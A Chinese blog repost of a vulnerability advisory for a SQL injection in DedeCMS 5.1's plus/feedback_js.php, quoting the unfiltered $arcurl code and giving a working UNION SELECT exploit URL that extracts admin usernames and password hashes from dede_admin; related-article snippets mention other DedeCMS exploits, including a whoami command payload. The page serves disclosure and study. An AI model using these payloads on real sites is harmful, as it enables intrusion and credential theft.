织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

最新推荐文章于 2021-07-12 18:04:16 发布
最新推荐文章于 2021-07-12 18:04:16 发布
阅读量248 收藏
点赞数
文章标签: php
漏洞版本:
DEDECMS 5.1
漏洞描述:
同样是在magic_quotes_gpc=off的情况下可用

此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此处$arcurl没有过滤
if(is_array($row)) $urlindex = $row['id'];
//存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID为空或$urlindex为空则退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......
看一下利用方法吧,嘿,为了闭合我用了两次union
<* 参考
http://www.st0p.org/blog/archives/dedecms-5-1-feedback_js-php-0day.html
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
weixin_33997389
关注
织梦DedeCMS select_soft_post.php任意文件上传漏洞解决办法
qq_31763129的博客
04-26 6666
最近很多建站朋友发现织梦DedeCMS安装在阿里云服务器后会在阿里云后台提示有一个dedecms任意文件上传漏洞,引起的文件是织梦安装目录下的/include/dialog/select_soft_post.php文件。原因是在获取完整文件名的时候没有将会对服务器造成危害的文件格式过滤掉,所以我们需要手动添加代码过滤,具体操作方法如下: 我们找到并打开/include/dialog/select_...
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 503
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
dedecms注入漏洞feedback.php,织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
weixin_39912580的博客
03-31 283
影响版本:DEDECMS 5.1漏洞描述:同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id From...
DedeCMS 5.1 直接写入马漏洞
HackCode的专栏
07-26 1505
最早见于http://groups.google.com/group/ph4nt0m/t/357dbcd7711f1864 经过研究发现。可以很方便的写入一个小马,前提是服务器开放会员系统,而且有图书连载里有类别。 漏洞代码如下: include/inc_bookfunctions.php function WriteBookText($cid,$body) {         global
dedecms注入漏洞feedback.php,织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞
weixin_32643811的博客
03-31 502
影响版本:dedecms GBK 5.1漏洞描述:在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id Fro...
Dedecms v5.7 plus\feedback.php SQL注入漏洞
weixin_30607029的博客
12-31 621
漏洞版本: dedecms 5.7 漏洞描述: DedeCms是免费的PHP网站内容管理系统。 Dedecms v5.7的plus\feedback.php SQL没有正确验证用户提供的输入,在实现上中存在注入漏洞,攻击者可利用此漏洞注入SQL代码。 <* 参考 http://huakai.paxmac.org/?p=508 *> 转载于:https:...
织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
weixin_42104947的博客
03-10 518
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.Hackme论坛原创 转载请附带原文链接作者: c4rp3nt3r@0x50sec.orgDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.算了不公开了,不能糟蹋0day了.传送门 DedeCmS V57 p...
织梦dedecms建站详细教程.doc
01-12
织梦DEDecms建站详细教程 DEDecms是一款流行的内容管理系统,拥有强大的功能和灵活的架构。本教程旨在指导读者快速搭建一个基于DEDecms的网站,涵盖环境配置、程序安装、系统文件夹讲解等多个方面的内容。 ...
ask.rar_ask module_ask问答_dedecms_mark_ico.gif
09-24
DedeCMS织梦内容管理系统)作为一款深受开发者喜爱的开源CMS平台,其丰富的功能和易用性赢得了广泛的赞誉。其中,"ask模块"便是DedeCMS为满足用户问答需求而特别设计的功能组件。本文将深入探讨这个模块的特性和...
织梦dede feedback标签调用说明
08-14 388
标签名称:feedback功能说明:用于调用最新评论适用范围:全局使用基本语法:{dede:feedback}<ul><li class='fbtitle'>[field:username function="(@me=='guest' ? '游客' : @me)"/] 对 [field:title/] 的评论:</li><li class='f...
织梦”CMS注入高危漏洞情况
遥远的星星
09-15 2804
织梦”CMS注入高危漏洞情况 作者:     时间:2014-04-17   “织梦”CMS是由上海卓卓网络科技有限公司研发的一款网站建站系统软件,又称“DEDE内容管理系统”,在国内应用较为广泛。2014年2月25日,该软件被披露存在一个高危漏洞,由于页面参数未进行严格过滤,存在SQL注入漏洞。受漏洞
dedecms织梦:feedback评论内容
qbbzqzz的专栏
06-07 1234
feedback 评论内容 (>DedeCMS 4,DedeCMS 5) 名称:feedback 功能:用于调用最新评论 语法: {dede:feedback}     [field:username function="(@me=='guest' ? '游客' : @me)"/] 对 [field:title/] 的评论:   [field:msg /]   {
php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY
weixin_42299728的博客
03-26 206
这个漏洞是我和Rainy’Fox一起发现的同样是在magic_quotes_gpc=off的情况下可用漏洞版本:DEDECMS 5.1漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne...
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 6047
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dede_sysconfig:织梦系统配置表
云加速
02-28 1786
织梦数据库结构表名:dede_sysconfig是系统配置表,下面将dede_sysconfig表中的各字段说明如下。 dede_sysconfig(系统配置表) 字段名 说明描述 具体参数 aid 参数ID smallint(8) unsigned NOT NULL 默认 '0' varname 参数名
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 565
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
织梦dedecms漏洞修复大全含任意文件上传漏洞注入漏洞
zxy840552216的博客
07-12 1330
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天就为大家讲解一下如何修复任意文件上传漏洞注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialog/select_soft_post.php;SQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php...
dedecms v56 plus/search.php 注入漏洞
最新发布
09-22
dedecms v56 plus 是一个开源的内容管理系统,其中的 search.php 文件存在注入漏洞。 这个注入漏洞允许攻击者通过构造恶意的请求,在 search.php 页面中执行恶意的 SQL 代码。攻击者可以利用这个漏洞获取敏感的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值